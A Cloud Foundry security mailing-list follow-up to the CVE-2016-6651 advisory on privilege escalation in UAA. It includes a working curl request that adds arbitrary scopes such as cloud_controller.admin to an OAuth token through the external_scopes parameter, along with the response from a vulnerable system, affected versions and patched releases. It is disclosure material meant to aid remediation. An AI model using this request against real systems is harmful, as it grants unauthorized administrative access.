Re: [HIGH] CVE-2016-6651: Privilege Escalation in UAA


Molly Crowther
 

Hello all,

In the interest of full public disclosure, the CFF Security Team would also
like to share some additional information about this vulnerability that
will aid in testing and remediation. Please let us know if you have any
questions or concerns.

Thanks,
Molly Crowther
Cloud Foundry Foundation Security Team
Description of Vulnerability

The vulnerability exposes an untested parameter that lets any application
add arbitrary scopes (permissions) to an access token.

curl https://login.urlredacted.com/oauth/token
<https://login.run.pivotal.io/oauth/token> \

-H"Accept: Application/json" \

-u "cf:" \

-d "username=<username here>" \

-d "password=<password here>" \

-d "client_id=cf" \

-d "grant_type=password" \

-d "response_type=token" \

-d "external_scopes=cloud_controller.test"

A vulnerable system will return the following response:

{

"access_token": "redacted for readability",

"expires_in": 599,

"jti": "redacted for readability",

"refresh_token": "redacted for readability",

"scope": "openid … cloud_controller.test",

"token_type": "bearer"

}

cloud_controller.test is an arbitrary string, but may as well be
cloud_controller.admin.

Applications that perform off-line validation will happily accept the
inserted string as a permission. Applications that use online validations,
i.e. the use of the /check_token UAA API endpoint, are not vulnerable - the
UAA validates the permissions against what’s in the database (uaadb).

A patched system will ignore the external_scopes parameter completely, and
cloud_controller.test will not be returned in the response.

On Mon, Sep 26, 2016 at 11:23 AM, Molly Crowther <mcrowther(a)cloudfoundry.org
wrote:
CVE-2016-6651: Privilege Escalation in UAA
Severity

High
Vendor

Cloud Foundry Foundation
Versions Affected

-

Cloud Foundry release v242 and earlier versions
-

UAA release v3.7.0 & earlier versions
-

UAA bosh release (uaa-release) v16 & earlier versions

Description

A privilege escalation vulnerability has been identified with the
/oauth/token endpoint in UAA allowing users to elevate the privileges in
the token issued.
Mitigation

OSS users are strongly encouraged to follow one of the mitigations below:

-

Upgrade to Cloud Foundry v243 [1] or later
-

For standalone UAA users
-

For users using UAA Version 3.0.0 - 3.7.0, please upgrade to UAA
Release to v3.7.3[2], v3.4.5[3] or v3.3.0.6[4]
-

For users using standalone UAA Version 2.X.X, please upgrade to UAA
Release to v2.7.4.8 [5]
-

For users using UAA bosh release, please upgrade to UAA-Release v17
[6] if upgrading to v3.7.3 [2] ,v12.6 [7] if upgrading to v3.4.5[3] or
v11.7 [8] if upgrading to v3.3.0.6[4]

Credit

SAP HCP Security Team
References

-

[1] https://github.com/cloudfoundry/cf-release/releases/tag/v243
-

[2] https://github.com/cloudfoundry/uaa/releases/tag/3.7.3
-

[3] https://github.com/cloudfoundry/uaa/releases/tag/3.4.5
-

[4] https://github.com/cloudfoundry/uaa/releases/tag/3.3.0.6
-

[5] https://github.com/cloudfoundry/uaa/releases/tag/2.7.4.8
-

[6] https://github.com/cloudfoundry/uaa-release/releases/tag/v17
-

[7] https://github.com/cloudfoundry/uaa-release/releases/tag/v12.6
-

[8] https://github.com/cloudfoundry/uaa-release/releases/tag/v11.7

History2016-09-26: Initial vulnerability report published

Join cf-dev@lists.cloudfoundry.org to automatically receive all group messages.